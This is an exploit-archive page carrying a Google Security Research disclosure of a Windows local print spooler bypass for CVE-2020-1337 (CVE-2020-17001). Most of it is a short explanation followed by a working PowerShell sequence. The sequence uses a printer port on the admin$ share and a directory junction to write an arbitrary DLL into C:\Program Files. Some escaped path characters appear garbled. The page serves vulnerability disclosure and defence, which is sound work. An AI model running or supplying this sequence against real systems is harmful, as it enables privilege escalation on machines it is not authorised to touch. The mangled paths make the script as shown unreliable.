what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Windows Local Spooler Bypass

Microsoft Windows Local Spooler Bypass
Posted Nov 11, 2020
Authored by James Forshaw, Google Security Research

Microsoft Windows suffers from a local spooler bypass vulnerability.

tags | exploit, local, bypass
systems | windows
advisories | CVE-2020-1337, CVE-2020-17001
SHA-256 | 61c3a397ee51f0006b58ad2f59a3812935b74612177c4a79db2bb0053572084d

Microsoft Windows Local Spooler Bypass

Change Mirror Download
Windows: Local Spooler CVE-2020-1337 Bypass

One way of exploiting this on Windows 10 2004 is to understand that FileNormalizedNameInformation will fail if the new path after the mount point is not under the root directory of the server. For example the admin$ share points to c:\\windows. If you set the mount point to write to c:\\Program Files then the normalization process will fail and the original string returned. This allows you to write to anywhere outside the windows directory by placing a mount point somewhere like system32\ asks. For example the following script will write the DLL to the root of Program Files.

mkdir \"C:\\windows\\system32\ asks\ est\"
Add-PrinterDriver -Name \"Generic / Text Only\"
Add-PrinterPort -Name \"\\\\localhost\\admin$\\system32\ asks\ est\ est.dll\"
Add-Printer -Name \"PrinterExploit\" -DriverName \"Generic / Text Only\" -PortName \"\\\\localhost\\admin$\\system32\ asks\ est\ est.dll\"
rmdir \"C:\\windows\\system32\ asks\ est\"
New-Item -ItemType Junction -Path \"C:\\windows\\system32\ asks\ est\" -Value \"C:\\Program Files\"
\"TESTTEST\" | Out-Printer -Name \"PrinterExploit\"


Related CVE Numbers: CVE-2020-1337,CVE-2020-17001,CVE-2020-1337.



Found by: forshaw@google.com

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close